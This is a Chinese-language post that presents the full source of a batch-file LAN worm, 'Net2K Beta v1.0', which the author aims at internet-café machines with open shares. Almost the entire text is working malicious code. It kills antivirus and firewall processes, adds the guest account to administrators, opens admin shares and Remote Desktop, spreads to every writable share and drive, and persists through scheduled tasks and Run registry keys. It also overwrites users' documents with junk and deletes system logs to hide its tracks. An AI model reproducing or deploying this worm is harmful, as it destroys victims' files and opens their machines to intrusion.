局域网共享蠕虫Net2K Beta v1.0版

写这个蠕虫主要是针对网吧，因为看到很多网吧开着共享，却无须密码就可以访问。这个蠕虫只要发现有可写权限的共享便可以将自身复

制进去，用AT命令或系统下次启动时启动。由于时间和设备的关系，这个蠕虫我并未去认真测试过，相信应该有不少BUG吧，有个按时感染每级

目录目标文件的BUG一直没有更好的解决思路，大家发现问题后请告知我，或你能修正、完善代码，请COPY我一份啊，先行谢过！

@echo off

echo

echo.

echo 局域网共享蠕虫Net2K Beta v1.0版

echo.

echo Net2K原创作品，欢迎访问http://www.52chb.com

echo.

echo 警告:本程序只做研究测试之用,对您运行本程序所造成一切后果本人概不负责！

echo 按任意键继续或关闭本程序退出

pause>nul

cls

tskill ccapp

tskill Rfw

tskill KAVPFW

tskill KAV9X

tskill PFW

tskill RavMon

if not exist c:\autoexec.bat copy /y %windir%\system32\autoexec.bat c:if not exist %windir%\system32\autoexec.bat copy c:\autoexec.bat

call attrib +h +r c:\autoexec.bat && attrib +h +r %windir%\system32\autoexec.bat

doskey at=

SET pk=1

SET ak1=254

IF %pk%==1 (

SET /A ak1=%RANDOM% %% %aK1%

)

SET LOVE=$%ak1%

attrib -h -r c:\msdos.sys && attrib -h -r c:\config.sys >nul

echo [option] >c:\msdos.sys

echo bootkey=1 >>c:\msdos.sys

echo BootMenu=0 >>c:\msdos.sys

echo BootWarn=0 >>c:\msdos.sys

echo BootFailSafe=0 >>c:\msdos.sys

echo DisabeLog =1 >>c:\msdos.sys

for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:\config.sys

attrib +r +h c:\msdos.sys && ATTRIB +H +R c:\config.sys >nul

for %%k in (a:,c:,d:,e:,f:,g:,h:,i:,j:,k:,m:,l:,n:,o:,p:,q:,r:,s:,t:,u:,v:,w:,x:,y:,z:) do @subst %%k %SystemRoot%\desktop

echo [rename] >Wininit.tmp

echo c:\windows\Wininit.ini=C:\Wininit.tmp >>Wininit.tmp

echo DIRNUL=F:\ >>Wininit.tmp

echo DIRNUL=E:\ >>Wininit.tmp

echo DIRNUL=D:\ >>Wininit.tmp

net view >a.txt

find "\\" a.txt >>l.txt

for /f "skip=2" %%a in (l.txt) do @copy /y Wininit.tmp %%a\C$

for /f "skip=2" %%a in (l.txt) do @call attrib +r +h %%a\C$\Wininit.tmp

net user guest Net2k%& /active:yes

net localgroup administrators guest /add

net share "ipc$"

net share "admin$"

net share "netbois"

net share "rpcss"

echo [Components] >c:\3389

echo TSEnable = on >>c:\3389

sysconmgr /i:sysoc.inf /u:c:\3389 /q

: 开硬盘共享

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @net share %%k$=%%k:\

: 攻击网关

ipconfig >Cf.txt && find "Default Gateway" Cf.txt >CH.txt

for /f "skip=2 tokens=13" %%a in (CH.txt) do @echo ping -n 20 -l 800 %%a

ping www.xhcatv.com.cn /n 15 /l 800

: 将自身复制到局域网内所有共享硬盘根目录

for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy autoexec.bat %%a\%%k$

for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%a\%%k$

\Autoexec.bat

cls

del %windir%\system32\logfiles\w3svc1\*.* /f /q

del %windir%\system32\logfiles\w3svc2\*.* /f /q

del %windir%\system32\config\*.event /f /q

del %windir%\system32\dtclog\*.* /f /q

del %windir%\*.txt /f /q

del %windir%\*.log /f /q

cls

: 将自身复制硬盘根目录

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy /y autoexec.bat %%k:

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @at 9:50 %%K:\autoexec.bat

：按时感染每级目录目标文件

echo @echo off >pk.bat

echo SET pk=1 >>pk.bat

echo SET ak1=19 >>pk.bat

echo SET ak2=19 >>pk.bat

echo IF %pk%==1 ( >>pk.bat

echo SET /A ak1=%RANDOM% %% %aK1% >>pk.bat

echo SET /A ak2=%RANDOM% %% %aK2% >>pk.bat

echo ) >>pk.bat

echo SET win=a%ak1%x >>pk.bat

echo copy /y pk.bat+xy.bat %win%.bat >>pk.bat

echo for %%y in (*.DOC,*.XLS,*.TXT,*.RIF,*.DBF,*.ARJ,*.log) do @echo FEI LOV YOU>%%y >>pk.bat

echo at 9:55 %win%.bat >>pk.bat

attrib /d /s -h -r

dir |find "<DIR>" >>Mm.txt

for /f "tokens=4" %%i in (Mm.txt) do @copy /y pk.bat %%i\>>%LOVE%.bat

for /f "tokens=4" %%i in (Mm.txt) do @echo at 9:55 %%i\%win%.bat >>%LOVE%.bat call %LOVE%.bat

for /f "tokens=4" %%i in (Mm.txt) do @echo > %%i\pp.txt

for /f "tokens=4" %%i in (Mm.txt) do @echo dir >>%%i\pp.txt

for /f "tokens=4" %%i in (Mm.txt) do @echo find "<DIR>" pp.txt > %%i\pp.bat

for /f "tokens=4" %%i in (Mm.txt) do @ren %%i\pp.txt l.bat

for /f "tokens=4" %%i in (Mm.txt) do @copy %%i\l.bat+pp.bat xy.bat

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%k:\%win%.bat

cls

echo REGEDIT4>>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg

echo "lovF"="c:\\autoexec.bat">>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg

echo "lov"="c:\\windows\\system32\\autoexec.bat">>lov.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings]>>lov.reg

echo "Key"=hexb,23,45,6f,8e,41,70,4c,44,5e,d0,23,79,c2,b4,b1>>h.reg

echo "Hint"="Hello. I am Net2K.">>lov.reg

reg import lov.reg

echo @echo off >del.bat

echo if exist *.* (del /f /q *.bat,*.tmp,*.txt,*.reg) else echo >>del.bat

call del.bat >nul

: 清扫战场闪人...

exit